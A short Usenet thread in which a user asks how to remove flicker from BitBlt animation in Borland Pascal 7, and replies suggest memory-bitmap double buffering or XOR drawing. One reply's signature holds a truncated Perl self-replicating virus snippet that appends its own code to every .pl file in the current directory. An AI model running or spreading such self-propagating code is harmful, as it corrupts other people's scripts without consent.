BitBlt function

Any one have any experience with the BitBlt function in BP7 ?  I am trying
to write a screen saver with moving graphics and cannot get rid of an
annoying flicker

Rod

Re:BitBlt function

Rod Dixon <rod_di...@bigpond.com> wrote:
> Any one have any experience with the BitBlt function in BP7 ?  I am trying
> to write a screen saver with moving graphics and cannot get rid of an
> annoying flicker

Windows? Use a memory bitmap, blit to it and then blit everything to
the screen. I do not know how to wait for a VBL, I always use direct
port access for it.

--
#!/usr/bin/perl
eval($0=q{$0="\neval(\$0=q{$0});\n";for(<*.pl>){open X,">>$_";print X

Re:BitBlt function

Rod Dixon schreef:

> Any one have any experience with the BitBlt function in BP7 ?  I am trying
> to write a screen saver with moving graphics and cannot get rid of an
> annoying flicker

> Rod

This might help.

Use an XorPut on the image just before moving to the next
position. (2 successive Xorputs restore the original screen)
or look at the SetWriteMode-procedure in the Help / Manual.

Greetings. Huub.

Other Threads